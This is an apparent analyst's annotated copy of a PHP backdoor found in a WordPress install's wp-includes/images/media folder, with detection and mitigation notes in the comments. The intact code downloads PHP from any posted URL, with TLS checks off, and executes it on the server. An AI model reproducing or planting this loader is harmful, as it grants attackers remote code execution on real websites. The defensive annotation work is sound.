File: /home/dothetest.co.uk/public_html/wp-includes/images/media/biji.php
<?php
// NOTE(review): analyst annotation. Per the report's "File:" line this script sits under
// wp-includes/images/media/; confirm against a clean copy of the same WordPress release
// whether any PHP file belongs in that directory. The code below accepts a URL, downloads
// it and include()s the response, so handle the file as a remote-code loader (backdoor).
session_start(); // the session is what carries the submitted URL ('remote_url') between requests
error_reporting(0); // turns PHP error reporting off for this request, so fetch/include failures are not surfaced
// Temporarily store the payload link in the session.
// NOTE(review): the POST field is named `password`, but nothing in this branch compares it
// to a secret; the value is only checked for URL syntax and then stored. No other access
// check is visible here, so any client that can reach the script can set the URL.
// Hunting hint: in access logs this shows up as a POST to this path answered by a redirect
// back to the same path, followed by a GET carrying the same session cookie.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
$input = trim($_POST['password']);
// filter_var() validates URL syntax only; no scheme or host allowlist is applied.
if (filter_var($input, FILTER_VALIDATE_URL)) {
$_SESSION['remote_url'] = $input;
header("Location: " . $_SERVER['PHP_SELF']); // redirect so a browser refresh does not re-POST
exit;
} else {
// Shown when the submitted value is not a syntactically valid URL.
echo "<p style='color:red;'>Masukkan link valid (contoh: https://...)</p>";
}
}
// If already "logged in" (a URL was accepted earlier) and a link is stored in the session.
// NOTE(review): depending on the configured session handler, the 'remote_url' value may
// still be recoverable from session storage during triage — confirm on the host.
if (isset($_SESSION['remote_url'])) {
$url = $_SESSION['remote_url'];
// Downloads $u with cURL and returns the response body, or false when curl_exec is
// unavailable or the transfer fails. Declared inside the if-block, so the function only
// exists when this branch runs.
function fetchRemote($u) {
if (!function_exists('curl_exec')) return false;
$c = curl_init($u);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // follows redirects, so the final host can differ from the stored URL
// Outbound User-Agent is copied from the inbound request (fallback 'Mozilla'), so it is
// not a stable indicator for egress detection.
curl_setopt($c, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla');
// Certificate and hostname verification are both disabled: the download is accepted from
// any TLS endpoint, including one presenting an invalid or self-signed certificate.
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($c, CURLOPT_TIMEOUT, 10); // whole transfer capped at 10 seconds
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5); // connection phase capped at 5 seconds
return curl_exec($c);
}
$code = fetchRemote($url);
// The only content check is that the response contains the literal "<?php".
if ($code && strpos($code, '<?php') !== false) {
// Staging file: a hidden dotfile in the system temp directory named after md5 of the URL,
// i.e. ".<32 hex chars>.php". It is written, included (executed inside this PHP process
// with the web server's privileges) and deleted again, so it exists on disk only briefly.
// Detection: file-creation auditing on the temp directory for short-lived dot-prefixed
// .php files, plus outbound HTTP(S) connections initiated by the PHP worker.
// Mitigation: egress filtering for the web server, and an open_basedir setting that
// excludes the temp directory so the write/include cannot succeed.
$temp = sys_get_temp_dir() . '/.' . md5($url) . '.php';
file_put_contents($temp, $code);
include $temp;
unlink($temp);
exit;
} else {
// Fetch failed or the response carried no PHP open tag: print an error and drop the
// stored URL so the form below is usable again.
echo "<p style='color:red;'>Gagal ambil data dari link tersebut.</p>";
unset($_SESSION['remote_url']);
}
}
?>
<!-- Form login password sebagai link payload -->
<form method="post">
<input type="text" name="password" placeholder="Input Ur Pass" style="width: 300px;">
<button type="submit">Ara Ara</button>
</form>